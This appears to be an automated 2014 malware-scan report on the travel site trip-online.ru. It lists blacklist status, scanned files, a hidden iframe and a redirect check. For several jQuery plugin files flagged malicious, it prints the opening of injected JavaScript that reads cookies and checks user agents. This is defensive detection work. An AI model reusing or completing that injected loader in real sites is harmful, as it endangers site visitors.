Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=trip-online.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://trip-online.ru/ | 200 OK Content-Length: 41952 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 645x320 style: hidden src: http://ui.sletat.ru/hotresult.html?sfx=_jvbu6&fbg=ffffff&mbg=ffffff&bbg=ffffff&bbd=eeeeee&cbd=abadb3&c1=222222&c2=838383&c3=9d1414&c4=dac6a1&style=.full.country%20span%23main%7bfont-weight%3a%20normal%20!important%3b%7d.full.country%20span%23main%7bfont-style%3a%20italic%20!important%3b%7d&tpl=sqrd¤cy=rub&rc=5&settings={ <iframe allowtransparency="true" onload="sm2_sly_jvbu6.init()" id="sm2_slyresult_jvbu6" src="http://ui.sletat.ru/hotresult.html?sfx=_jvbu6&fbg=ffffff&mbg=ffffff&bbg=ffffff&bbd=eeeeee&cbd=abadb3&c1=222222&c2=838383&c3=9d1414&c4=dac6a1&style=.full.country%20span%23main%7bfont-weight%3a%20normal%20!important%3b%7d.full.country%20span%23main%7bfont-style%3a%20italic%20!important%3b%7d&tpl=sqrd¤cy=rub&rc=5&settings={'plugins':['squared_output']}" height="320" width="645" frameborder="0" style="display:none" scrolling="no"> | ||
http://trip-online.ru/templates/zt_morbi/zt_menus/zt_moomenu/zt.moomenu.js | 404 Not Found Content-Length: 317 Content-Type: text/html | clean |
http://trip-online.ru/test404page.js | 404 Not Found Content-Length: 279 Content-Type: text/html | clean |
http://trip-online.ru/templates/zt_morbi/zt_menus/zt_fancymenu/zt_fancymenu.js | 404 Not Found Content-Length: 321 Content-Type: text/html | clean |
http://trip-online.ru/modules/mod_yoo_search/mod_yoo_search.js | 404 Not Found Content-Length: 305 Content-Type: text/html | clean |
http://trip-online.ru/modules/mod_nivoslider/assets/jquery.js | 200 OK Content-Length: 85423 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://trip-online.ru/modules/mod_nivoslider/assets/jquery.nivo.slider.js | 200 OK Content-Length: 26057 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t controlNavThumbsReplace: '_thumb.jpg', keyboardNav: true, pauseOnHover: true, manualAdvance: false, captionOpacity: 0.8, prevText: 'Prev', nextText: 'Next', randomStart: false, beforeChange: function(){}, afterChange: function(){}, slideshowEnd: function(){}, lastSlide: function(){}, afterLoad: function(){} }; $.fn._reverse = [].reverse; })(jQuery); Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://trip-online.ru/fancybox/lib/jquery.mousewheel-3.0.6.pack.js | 200 OK Content-Length: 2445 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t d.event.mouseHooks;d.event.special.mousewheel={setup:function(){if(this.addEventListener)for(var a=c.length;a;)this.addEventListener(c[--a],e,false);else this.onmousewheel=e},teardown:function(){if(this.removeEventListener)for(var a=c.length;a;)this.removeEventListener(c[--a],e,false);else this.onmousewheel=null}};d.fn.extend({mousewheel:function(a){return a?this.bind("mousewheel",a):this.trigger("mousewheel")},unmousewheel:function(a){return this.unbind("mousewheel",a)}})})(jQuery); Antivirus reports:
| ||
http://trip-online.ru/fancybox/source/jquery.fancybox.pack.js?v=2.1.5 | 200 OK Content-Length: 24196 Content-Type: application/x-javascript | clean |
http://trip-online.ru/fancybox/source/helpers/jquery.fancybox-buttons.js?v=1.0.5 | 200 OK Content-Length: 4102 Content-Type: application/x-javascript | clean |
http://trip-online.ru/fancybox/source/helpers/jquery.fancybox-media.js?v=1.0.6 | 200 OK Content-Length: 6366 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t if (rez) { type = item.type; params = $.extend(true, {}, item.params, obj[ what ] || ($.isPlainObject(opts[ what ]) ? opts[ what ].params : null)); url = $.type( item.url ) === "function" ? item.url.call( this, rez, params, obj ) : format( item.url, rez, params ); break; } } } if (type) { obj.href = url; obj.type = type; obj.autoHeight = false; } } }; }(jQuery)); Antivirus reports:
| ||
http://trip-online.ru/fancybox/source/helpers/jquery.fancybox-thumbs.js?v=1.0.7 | 200 OK Content-Length: 4897 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t }, onUpdate: function (opts, obj) { if (this.list) { this.list.stop(true).animate({ 'left': Math.floor($(window).width() * 0.5 - (obj.index * this.width + this.width * 0.5)) }, 150); } }, beforeClose: function () { if (this.wrap) { this.wrap.remove(); } this.wrap = null; this.list = null; this.width = 0; } } }(jQuery)); Antivirus reports:
| ||
http://ui.sletat.ru/client/linker_hot.js?settings={formViewMode:'block'}&sfx=_JvbU6 | 200 OK Content-Length: 24798 Content-Type: text/javascript | clean |
http://trip-online.ru//ui.sletat.ru/module-4.0/core.js/ | 404 Not Found Content-Length: 1844 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: trip-online.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 00:35:49 GMT
Pragma: no-cache
Server: nginx/1.6.2
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 05 Oct 2014 00:35:49 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 8084dac3c718e3dfaf1164f2960c1646=41bl7b2ee3ro3beafif2mn8pu7; path=/
Set-Cookie: zt_morbi_tpl=zt_morbi; expires=Fri, 25-Sep-2015 00:35:48 GMT; path=/
X-Powered-By: PHP/5.3.17
X-UA-Compatible: IE=EmulateIE8
GET / HTTP/1.1
Host: trip-online.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 00:35:49 GMT
Pragma: no-cache
Server: nginx/1.6.2
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 05 Oct 2014 00:35:49 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 8084dac3c718e3dfaf1164f2960c1646=41bl7b2ee3ro3beafif2mn8pu7; path=/
Set-Cookie: zt_morbi_tpl=zt_morbi; expires=Fri, 25-Sep-2015 00:35:48 GMT; path=/
X-Powered-By: PHP/5.3.17
X-UA-Compatible: IE=EmulateIE8
Second query (visit from search engine):
GET / HTTP/1.1
Host: trip-online.ru
Referer: http://www.google.com/search?q=trip-online.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: trip-online.ru
Referer: http://www.google.com/search?q=trip-online.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.